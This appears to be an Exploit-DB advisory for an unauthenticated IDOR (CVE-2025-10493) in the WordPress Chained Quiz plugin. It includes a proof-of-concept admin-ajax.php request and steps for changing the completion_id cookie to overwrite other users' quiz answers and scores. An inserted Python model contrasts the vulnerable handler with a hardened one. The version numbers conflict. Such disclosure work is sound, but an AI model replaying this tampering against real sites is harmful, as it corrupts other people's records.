[webapps] Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
Summary: The Chained Quiz plugin contains an unauthenticated Insecure Direct Object Reference vulnerability. An attacker can predict or enumerate the completion_id value carried in a cookie to tamper with other users' quiz answers and scores, compromising data integrity.
2025-12-25 00:00:00 Author: www.exploit-db.com

# Exploit Title: Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
# Date: 19-12-2025
# Exploit Author: Karuppiah Sabari Kumar (0xsabre)
# Vendor Homepage: https://wordpress.org/plugins/chained-quiz/
# Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip
# Version: <= 1.3.3
# Tested on: WordPress / Linux
# CVE: CVE-2025-10493

------------------------------------------------------------

## Vulnerability Type
Insecure Direct Object Reference (IDOR) / Improper Authorization

------------------------------------------------------------

## Description
The Chained Quiz plugin stores each quiz attempt using a predictable,
auto-incrementing database ID (completion_id) and exposes this value
directly in a client-side cookie named:

    chained_completion_id<quiz_id>

When submitting or re-submitting quiz answers via admin-ajax.php, the
server updates the quiz attempt record based solely on this cookie value,
without verifying that the attempt belongs to the currently authenticated
user.

No authentication is required to exploit this vulnerability when the
plugin is used with default settings.

The server retrieves the quiz attempt directly using the completion_id
from the cookie and performs an UPDATE query without verifying ownership.

As a result, an attacker can hijack or tamper with other users’ quiz
attempts by guessing or enumerating valid completion_id values and
replaying answer submissions.
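The handler behaviour described above, modelled in Python as an added example (this is not the plugin's PHP code): `submit_vulnerable` reproduces the cookie-trusting UPDATE, while `submit_fixed` binds each completion_id to an unguessable per-attempt token and adds an ownership check, so an enumerated ID alone no longer reaches another user's attempt. The in-memory store, field names and cookie format are constructed for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

@dataclass
class Attempt:
    completion_id: int          # predictable auto-increment ID, as in the plugin
    user_id: int                # 0 means anonymous, following WordPress convention
    token: str                  # unguessable per-attempt secret (added by the fix)
    answers: dict = field(default_factory=dict)

class QuizStore:
    """Constructed in-memory stand-in for the plugin's quiz-attempt table."""

    def __init__(self):
        self._rows = {}
        self._next_id = 1

    def start_attempt(self, user_id):
        # Returns the cookie value handed to the client: "<completion_id>.<token>"
        cid, self._next_id = self._next_id, self._next_id + 1
        token = secrets.token_urlsafe(32)
        self._rows[cid] = Attempt(cid, user_id, token)
        return f"{cid}.{token}"

    def get_attempt(self, cid):
        return self._rows[cid]

    def submit_vulnerable(self, cookie_id, question_id, answer):
        """Mirrors the advisory: the cookie's completion_id is trusted on its own."""
        row = self._rows[int(cookie_id)]
        row.answers[question_id] = answer
        return True

    def submit_fixed(self, cookie, current_user_id, question_id, answer):
        """Hardened handler: the attempt must be proven, not merely named."""
        try:
            cid_str, presented = cookie.split(".", 1)
            row = self._rows[int(cid_str)]
        except (ValueError, KeyError):
            return False
        # Capability check: the client must hold the attempt's secret (covers anonymous attempts)
        if not hmac.compare_digest(presented.encode(), row.token.encode()):
            return False
        # Ownership check: a logged-in user's attempt is only writable by that user
        if row.user_id != 0 and row.user_id != current_user_id:
            return False
        row.answers[question_id] = answer
        return True
```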

------------------------------------------------------------

## Affected Component
Quiz submission and results handling functionality via admin-ajax.php

------------------------------------------------------------

## Proof of Concept (PoC)

### Step 1: Victim user submission
A user completes a quiz. The submission is stored using a completion ID
and associated with the user’s session via a cookie, for example:

    chained_completion_id1=2

------------------------------------------------------------

### Step 2: Attacker interception
The attacker completes the same quiz and intercepts their own submission
request using a proxy or browser developer tools.

Example request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Cookie: chained_completion_id1=1
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded

    answer=0&question_id=1&quiz_id=1&post_id=117&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1

------------------------------------------------------------

### Step 3: Tampering
The attacker modifies the cookie value to match another user’s quiz
attempt, for example:

    chained_completion_id1=2

The attacker may also modify parameters such as "answer" or "points" to
manipulate quiz responses or scores.

The modified request is then sent to the server.

------------------------------------------------------------

### Step 4: Result
The server overwrites the victim user’s quiz submission, including answers
and points, without validating ownership of the completion ID.

------------------------------------------------------------

## Impact
An attacker can arbitrarily modify quiz answers, scores, or results
belonging to other users. This results in an integrity violation of quiz
data and allows unauthorized manipulation of finalized quiz attempts.
In environments where quiz results are used for assessments, leaderboards,
or certificates, this can undermine trust in the platform and affect any
downstream integrations that rely on quiz completion data.

------------------------------------------------------------

## CWE
- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-285: Improper Authorization

------------------------------------------------------------

Source: https://www.exploit-db.com/exploits/52464